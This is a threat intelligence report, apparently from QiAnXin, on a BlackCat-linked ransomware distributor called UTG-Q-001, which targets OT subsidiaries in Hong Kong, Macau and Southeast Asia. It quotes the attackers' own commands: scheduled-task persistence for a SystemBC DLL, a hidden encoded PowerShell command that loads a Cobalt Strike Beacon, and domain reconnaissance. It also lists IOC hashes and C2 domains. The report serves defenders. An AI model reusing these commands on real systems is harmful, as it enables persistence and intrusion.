Overview
The QiAnXin Threat Intelligence Center has been monitoring numerous ransomware distributors. In April of this year, we extensively disclosed the activities of the operators behind Conti ransomware and Quantum ransomware, known as the Karakurt Group [1], targeting OT units in China. After the report was released, the group's activities within the country sharply declined, but they continued to exploit the Exchange vulnerability to infiltrate some financial companies and perform lateral movement. We have issued corresponding notifications to the affected clients.
Recently, we observed that BlackCat disclosed relevant data of a local petrochemical development company in Taiwan on the dark web. Ransomware attacks targeting OT units have escalated. Seizing this opportunity, we publicly reveal a ransom distributor that we have internally tracked, naming it UTG-Q-001. This group targets subsidiaries of OT units in the Hong Kong, Macau, and Southeast Asia regions.
During the subsequent tracking process, we found overlaps between UTG-Q-001 and a report released by the overseas competitor Trend Micro [2]. Since we informed our clients early and assisted in the investigation, we did not observe the deployment of ransomware. According to Trend Micro's report, UTG-Q-001 is confirmed as one of the many operators of the BlackCat ransomware. However, we do not rule out the possibility that this group may deliver other families of ransomware in the future. Currently, the ransom division among different ransomware families is becoming more competitive, with some distributors even able to get 85% of the ransom [3].
Technical Details
In our internal network, we initially observed the attackers releasing a backdoor of the SystemBC family named svc.dll and creating a scheduled task. However, it was detected and eliminated by the QiAnXin TianRan system. Since the SystemBC family is generally used in conjunction with ransomware groups, we immediately launched an investigation.
| - |
|---|
| Cmd |
| cmd.exe /C schtasks /create /ru SYSTEM /sc ONSTART /tn Update /tr "cmd /c rundll32 C:\users\public\music\svc.dll, rundll |
| cmd.exe /C schtasks /run /TN Update |
| During the investigation, we found that the attackers invoked msiexec to launch an installer. |
| - |
|---|
| Cmd |
| cmd.exe /C C:\Users\Public\Music\setup.msi |
The Setup.msi installs the AteraAgent legitimate remote control on the victim machine, with the control account being Margaret.Gibson92@proton.me. The use of AnyDesk was also observed on other machines within the internal network.
Subsequently, the attackers used wmic to execute PowerShell commands on other machines within the internal network, loading the Cobalt Strike Beacon malware into memory. This process was detected by the QiAnXin TianYan system.
| - |
|---|
| Cmd |
| cmd.exe /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQ…. |
The Cobalt Strike watermarks (587247372, 674054486) were involved, executing commands to retrieve relevant information about the current domain. Tools such as socat and NetCat were used during internal network scanning.
| - |
|---|
| Cmd |
| powershell -nop -exec bypass -EncodedCommand bgBsAHQAZQBzAHQAIAAvAGQAbwBtAGEAaQBuAF8AdAByAHUAcwB0AHMAIAAvAGEAbABsAF8AdAByAHUAcwB0AHMA |
| nltest /dclist: |
| nltest /domain_trusts /all_trusts |
| net1 user XXX XXXX |
| ping AD-XXXXX.com |
| netstat -ano |
QiAnXin TianYan observed the attackers using a domain management account to transfer trojans and tools to other machines via SMB.
An attempt to laterally move to one of the servers triggered an alert from the QiAnXin Jiaotu product.
Through our tracing, it seems that the attack entry point was an IT staff member downloading a repackaged installer from a fake tool website mimicking UTG-Q-001. This led to the trojan entering the corporate intranet. Subsequently, the attackers used Mimikatz to capture the domain admin's password on the machine and initiate internal roaming.
In another UTG-Q-001 attack incident, the attackers used an Nday vulnerability as an entry point to infiltrate a subsidiary of a manufacturing company in Southeast Asia. They implanted a CS trojan throughout the entire internal network using the EternalBlue vulnerability but were intercepted by the QiAnXin Liuhé engine.
Conclusion
Currently, all products from the QiAnXin Threat Intelligence Center, including the QiAnXin Threat Intelligence Platform (TIP), TianQing, TianYan Advanced Threat Detection System, QiAnXin NGSOC, and QiAnXin Situational Awareness, support precise detection of such attacks.
IOC
MD5:
2a2e7138dea08a2b4619190d585955be
4574cfe334276e77cb5bd32c66036893
1957deed26c7f157cedcbdae3c565cff
5536eb514c9c4978d99f1250ae173947
8174a402b61858a7447f06daf6a35a23
ebbeb13d9bb798571a0d092fdf8466de
aa9ac683116f7ee66efd777da907b0c0
44979e1c246983eff8ba3fde9ba61716
530d163f149bc87afd42fa3a289eed0d
CC:
93.115.25.41:443
accessinfonet.com
adspirenetwork.com
cetixsystems.com
datacloudprocessing.com
developersolutions.org
prepayersolutions.com
usadevgroup.com
devsolution.top
devopspdx.com
netdevstudio.com
upbetanetworks.org
financialservicesunion.com
rapidevolution.org
devopszone.org
databasewebdevelopment.com
incitewebsolution.com
configupdate.com
devnetapp.com
tcessolution.com
acornservices.org
Reference Links
[1]. https://mp.weixin.qq.com/s/E2X_QqbkZ6kbsgmGZ108Tg
[2]. https://www.trendmicro.com/en_my/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html#:~:text=Malvertising%20Used%20as%20Entry%20Vector%20for%20BlackCat%2C%20Actors%20Also%20Leverage
[3]. https://www.group-ib.com/blog/qilin-ransomware/